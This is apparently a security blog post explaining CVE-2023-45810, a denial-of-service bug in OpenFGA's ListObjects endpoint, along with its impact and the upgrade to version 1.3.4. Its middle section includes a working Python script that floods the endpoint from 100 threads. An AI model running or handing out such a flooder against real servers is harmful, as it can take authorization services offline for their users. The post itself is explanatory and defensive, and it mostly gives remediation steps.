CVE-2023-45810 - How OpenFGA’s ListObjects Bug Can Break Your Authorization Service

OpenFGA is quickly becoming a popular choice among developers for flexible permissions and authorization logic, inspired by the famous Google Zanzibar paper. But like any fast-moving open-source project, OpenFGA isn’t immune to security flaws. In late 2023, security researchers found a resource management bug that could take down an entire OpenFGA instance. This post will break down CVE-2023-45810, explain how it works, and what you can do to stay safe.

What’s OpenFGA?

If you’re new to OpenFGA, it’s an open-source engine that allows developers to manage complex authorization logic and relationships. It provides a way to check if, for instance, a user can read a document or access some specific feature, by defining and querying relationships between users, resources, and actions.

> Official Repo: https://github.com/openfga/openfga
> Project Website: https://openfga.dev/

Summary

OpenFGA versions before 1.3.4 have a denial-of-service (DoS) flaw. If several clients make many ListObjects API calls, the server holds onto resources even after sending a response. Eventually, it can use up all available resources, making the entire OpenFGA service freeze or stop responding.

There's no workaround. The only fix is to upgrade.

Security References

- CVE entry
- GitHub Security Advisory
- Patch Release on GitHub

How Does the DoS Exploit Work?

The problematic area is the ListObjects API endpoint, which is typically used to fetch lists of resources — for example, “list all documents User X can read.” In some scenarios, when a client calls this endpoint repeatedly (with different or even the same parameters), server resources like goroutines, memory, or handles aren’t cleaned up after OpenFGA sends the response.

Example: Exploit with Python

Let’s see how an attacker (or even a misconfigured client) could accidentally or intentionally DoS your OpenFGA:

import requests
import threading

API_URL = "http://your.fga.server/v1/store/yourstoreid/list-objects"
HEADERS = {"Authorization": "Bearer YOUR_API_TOKEN", "Content-Type": "application/json"}

def flood_listobjects():
    data = {
        "type": "document",
        "relation": "reader",
        "user": "user:bob"
    }
    while True:
        try:
            response = requests.post(API_URL, json=data, headers=HEADERS)
            print(f"Status: {response.status_code}")
        except Exception as e:
            print(f"Error: {e}")

threads = []
for _ in range(100):
    t = threading.Thread(target=flood_listobjects)
    t.start()
    threads.append(t)

Very soon, the server runs out of resources and becomes unresponsive.

Note: This is only for educational demonstration. Do not use this against anyone else's system.

Impact: When Things Go Very Wrong

If your OpenFGA instance is publicly accessible or exposed to busy internal clients, this vulnerability means:

- Your authentication/authorization checks can grind to a halt. No new permissions queries get processed until the server is restarted.
- In worst-case scenarios, your entire app may become unavailable or unsafe if it depends on OpenFGA for access controls.

Fix: How to Stay Safe

The OpenFGA team has already patched this issue in version 1.3.4. The fix ensures that all server-side resources associated with ListObjects calls are released right after responding.

1. Upgrade OpenFGA to at least v1.3.4.

- Release notes with details

2. No breaking changes: The fix is backwards compatible, so the upgrade should be smooth.

3. Check for exposed endpoints: As a best practice, don’t expose OpenFGA APIs directly to untrusted networks.

If you’re running OpenFGA in Docker Compose or Kubernetes, just update your image tags:

services:
  openfga:
    image: openfga/openfga:v1.3.4
    # ... your config

Or, with the Docker CLI:

docker pull openfga/openfga:v1.3.4
docker stop myopenfga
docker rm myopenfga
# 8080 is OpenFGA's default HTTP API port; the image needs the `run` subcommand to start the server
docker run -d --name myopenfga -p 8080:8080 openfga/openfga:v1.3.4 run

Conclusion

CVE-2023-45810 is a real-world example of how subtle resource leaks can have a giant impact on cutting-edge infrastructure. If you’re running OpenFGA, double-check your version and upgrade if needed. As OpenFGA adoption grows, it’s crucial to stay alert for new security advisories.

More Resources

- OpenFGA Documentation
- Google Zanzibar Paper

Questions or want to share your experience? Drop a comment below or check out the OpenFGA discussions on GitHub.


Timeline

Published on: 10/17/2023 23:15:12 UTC
Last modified on: 10/25/2023 13:38:33 UTC